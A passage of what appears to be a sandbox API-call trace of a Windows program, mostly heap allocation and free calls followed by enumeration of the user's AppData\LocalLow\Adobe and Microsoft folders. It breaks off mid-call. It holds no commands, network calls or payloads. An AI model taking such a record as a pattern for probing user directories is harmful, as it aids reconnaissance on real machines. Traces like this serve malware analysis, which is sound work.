dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0238.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0238.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86120 [0238.718] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0238.718] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.718] PathFindFileNameW (pszPath="") returned="" [0238.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.718] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.720] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.720] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0238.720] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x33f0408 [0238.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0238.720] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0238.720] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.721] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0238.721] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.721] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0238.721] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0238.721] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.721] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.721] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.721] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.721] PathFindFileNameW (pszPath="") returned="" [0238.721] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.725] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.725] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0238.725] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0238.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0238.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0238.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0238.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0238.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0238.726] FindClose (in: 